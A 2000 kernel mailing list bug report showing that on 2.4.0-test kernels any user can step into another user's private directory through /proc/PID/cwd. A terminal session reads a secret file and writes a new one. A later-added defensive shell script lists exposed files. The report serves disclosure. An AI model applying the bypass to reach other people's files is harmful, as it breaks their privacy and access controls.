2.4.(0-test10): /proc security hole

From: Lutz Pressler (lp@SerNet.DE)
Date: Sun Nov 05 2000 - 08:02:14 EST


Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended:

testuser@vax:~ > id
uid=503(testuser) gid=100(users) Gruppen=100(users)
testuser@vax:~ > ls -lad .
drwx------ 7 testuser users 4096 Nov 5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la
insgesamt 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir

Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser 588 0.0 2.1 2256 1360 tty2 S 13:38 0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x 3 testuser users 0 Nov 5 13:49 .
dr-xr-xr-x 59 root root 0 Nov 5 13:34 ..
-r--r--r-- 1 testuser users 0 Nov 5 13:49 cmdline
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 cwd -> /home/testuser/dir
-r-------- 1 testuser users 0 Nov 5 13:49 environ
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 exe -> /bin/bash
dr-x------ 2 testuser users 0 Nov 5 13:49 fd
-r--r--r-- 1 testuser users 0 Nov 5 13:49 maps
-rw------- 1 testuser users 0 Nov 5 13:49 mem
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 root -> /
-r--r--r-- 1 testuser users 0 Nov 5 13:49 stat
-r--r--r-- 1 testuser users 0 Nov 5 13:49 statm
-r--r--r-- 1 testuser users 0 Nov 5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd >

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir >
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x 2 testuser users 4096 Nov 5 13:53 .
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 ..
-rw-r--r-- 1 lpressl users 5 Nov 5 13:53 newfile

This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?

Regards,
  Lutz
  

-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:lp@SerNet.DE
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
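
An added example, not part of the original message: in the session above, `dir`, `file` and `subdir` carry group/other permission bits themselves, and only the `drwx------` home directory above them kept other users out. The shell function below lists entries in that position under a private directory; the function names are hypothetical and it assumes a POSIX `find`.

```sh
#!/bin/sh
# Added example (not from the original message). Lists entries beneath a
# private directory whose own mode grants group/other access, i.e. entries
# that only the parent's mode keeps other users away from.
# Function names are hypothetical.

# Print the paths handed to find(1) that have any group/other permission bit.
# Symlinks are skipped: their own mode bits are not used for access checks.
has_go_bits() {
    find "$@" ! -type l \( -perm -040 -o -perm -020 -o -perm -010 \
        -o -perm -004 -o -perm -002 -o -perm -001 \) -print
}

# Usage: parent_guarded DIR
# Returns 0 and prints the affected entries (possibly none) when DIR is
# private; returns 2 when DIR is missing or itself open to group/other.
parent_guarded() {
    top=$1
    [ -d "$top" ] || { echo "not a directory: $top" >&2; return 2; }
    # -prune restricts this first check to DIR itself.
    if [ -n "$(has_go_bits "$top" -prune)" ]; then
        echo "$top is not private; nothing depends on it alone" >&2
        return 2
    fi
    has_go_bits "$top" | sort
}

# Run as a script: sh parent_guarded.sh /home/someuser
if [ "$#" -gt 0 ]; then
    parent_guarded "$1"
fi
```

Run it as the directory's owner or as root, since other users cannot descend into a private directory. Tightening the modes of the listed entries means they no longer depend on the parent directory alone.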